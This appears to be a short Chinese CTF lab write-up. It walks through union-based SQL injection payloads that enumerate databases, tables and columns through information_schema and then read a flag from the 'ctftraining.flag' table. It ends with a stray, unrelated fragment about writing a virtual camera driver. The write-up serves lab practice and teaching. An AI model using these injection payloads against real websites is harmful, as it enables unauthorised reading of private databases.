这里就是单纯的找一下flag在哪,通关整个靶场在sql注入分区,虽然还没有通关。
这里要先看一下数据库都有哪些,用到语句:?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+
发现这个数据库:ctftraining 可能有我们需要的信息
于是接着就是:
查看该数据库中都有什么表:?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),3--+
发现存在flag表,接着就是要看该表的信息:?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='ctftraining' and table_name='flag'),3--+
发现就只有一列,然后就是查看该列的信息:
这里需要注意,我们要指定是ctftraining数据库的flag表,如果单纯的是flag则是查找的security.flag这时就会报错。
正确语句:?id=-1' union select 1,(select group_concat(flag) from ctftraining.flag),3--+
编写虚拟摄像头驱动)
)
